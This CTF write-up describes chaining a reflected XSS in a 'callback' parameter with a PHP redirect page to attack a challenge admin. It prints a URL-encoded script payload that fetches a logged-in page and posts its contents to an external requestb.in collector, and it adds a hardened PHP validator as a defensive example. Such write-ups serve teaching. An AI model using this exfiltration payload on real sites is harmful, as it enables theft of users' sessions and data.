Challenge:
No description
http://47.88.218.105:20010/
The login form! We create an account, log in, and the challenge begins!
Obviously we click “get flag”, but it requires us to be admin. There is one clear point for us to attack: “personal website”.
So we need to create an XSS somewhere and trick the admin into visiting it.
After surfing around, I found something good:
Change “getInfo” to some random chars and it gets printed back, so how about an XSS payload?
Great!
So construct a payload that redirects with the cookie, send it to the admin to steal his cookie, and the challenge is solved? Nope!
The length is limited to 50 chars, so we can't send it directly!
It’s SSRF TIMEEEEEE!
The idea is to create our own PHP page which redirects whoever visits it to the XSS page above!
I created index.php at /var/www/html/tsu/ like this:
<?php header("Location: http://47.88.218.105:20010/action.php?callback=%3Cscript%20src%3D%22https%3A%2f%2fajax.googleapis.com%2fajax%2flibs%2fjquery%2f2.1.3%2fjquery.min.js%22%3E%3C%2fscript%3E%3Cscript%3E%20%24.get%28%27%2floged.php%27%2Cfunction%28data%29%7B%24.post%28%27https%3A%2f%2frequestb.in%2fr0uyoer0%3Finsp%3D%27%2C%7Bname%3Adata%7D%29%3B%7D%29%3B%20%3C%2fscript%3E");
Send my host to the admin: https://meepwn.team/tsu/
Wait a few seconds, and got it! The PHPSESSID of the admin, but… we need the “username” cookie to make us admin. Unfortunately, the HttpOnly flag is on, so we can't steal it.
The only way to get the flag is to trick the admin into clicking “get flag” himself and sending the flag back to us. That means we have to get the CSRF token and make the request with it.
I haven't practiced much with XSS, so this stage bothered me. Luckily, I have a very good XSS-in-action teammate, @quynhnhu,
and he did it well; here is the script:
https://pastebin.com/TqdGcYjP
We got the flag!
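The root cause above is action.php echoing the callback name verbatim. Below is an added example of how such a JSONP-style handler can be hardened (my own code, not the challenge's real action.php, whose source is not shown; the $info payload and the file layout are assumptions):

```php
<?php
declare(strict_types=1);

// Hardened replacement for a JSONP-style "callback" reflector. Added example,
// not the challenge's own action.php; $info and the overall layout are assumed.
//
// Vulnerable shape the writeup describes (assumed reconstruction): the name is
// echoed as-is, so markup passed in ?callback= lands in the response unchanged.
//   echo $_GET['callback'] . '(' . json_encode($info) . ');';

// Return the callback name only if it is a bare JavaScript identifier
// (optionally dotted, e.g. "app.getInfo"); otherwise return null. Angle
// brackets, quotes, spaces and every other markup character fail the regex,
// so nothing can break out of the generated "name(...)" call.
function safe_callback(?string $cb): ?string
{
    if ($cb === null || $cb === '' || strlen($cb) > 64) {
        return null;
    }
    $ident   = '[A-Za-z_$][A-Za-z0-9_$]*';
    $pattern = '/^' . $ident . '(?:\.' . $ident . ')*$/';
    return preg_match($pattern, $cb) === 1 ? $cb : null;
}

$info = ['user' => 'guest', 'admin' => false];   // constructed sample data

$cb = safe_callback($_GET['callback'] ?? null);
if ($cb === null) {
    http_response_code(400);   // reject instead of reflecting anything back
    exit;
}

// Serve the reply as script, not HTML, and forbid MIME sniffing, so the
// browser never renders this endpoint's output as a page.
header('Content-Type: application/javascript; charset=utf-8');
header('X-Content-Type-Options: nosniff');

// JSON_HEX_* keeps "<", ">", "&" and quotes out of the JSON literal as well.
$json = json_encode($info, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
echo '/**/' . $cb . '(' . $json . ');';
```

With the callback validated, the 50-character limit, the redirect trick and the CSRF-token step all lose their starting point, since no script ever gets reflected into the admin's page.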
Btw it's not SSRF, it's CSRF; you've forced the admin to relocate his browser, not the server.
Thank you, my mistake 😀